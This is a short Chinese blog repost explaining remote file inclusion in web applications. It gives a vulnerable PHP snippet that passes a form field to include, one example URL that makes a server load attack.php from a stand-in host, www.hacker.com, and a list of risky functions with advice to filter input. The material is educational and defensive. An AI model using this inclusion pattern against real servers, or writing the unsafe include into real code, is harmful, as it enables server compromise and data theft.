小默

【转】WEB安全系列之三:执行恶意脚本

    * 恶意代码执行攻击利用的重点是web开发中引用变量做为程序执行的一部分代码
    * 恶意代码执行攻击的技术重点在于让服务器执行了恶意代码,从而完成入侵或数据盗取等行为
    * 恶意代码执行攻击的方法重点在于Web开发中,对变量的引用的几个关键部位没有细化处理


   本文主要介绍恶意代码执行攻击的过程而不是技术细节。
先看一段php代码的例子:

$report = $_POST['file']; //定义report变量某个表单变量
include $report;          //在代码中包含此变量

如果攻击者巧妙的利用这个漏洞,就可以令被攻击服务器执行自己的恶意程序,类似的语法:
http://www.tester.com/index.php?file=http://www.hacker.com/attack.php

这时,程序就会读取恶意的attack.php并引入到index.php中做为执行的一个部分!

此类攻击对于脚本类网页代码最有效。

在编写代码时,尤其是利用以下的函数引用代码片段时:
PHP:include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet:java.io.File(), java.io.FileReader(), ...
ASP:include file, include virtual, ...
应该对所引用的内容做安全的过滤!

posted on 2010-04-14 14:24 小默 阅读(587) 评论(0)  编辑 收藏 引用 所属分类: Security


只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理


导航

统计

留言簿(13)

随笔分类(287)

随笔档案(289)

漏洞

搜索

积分与排名

最新评论

阅读排行榜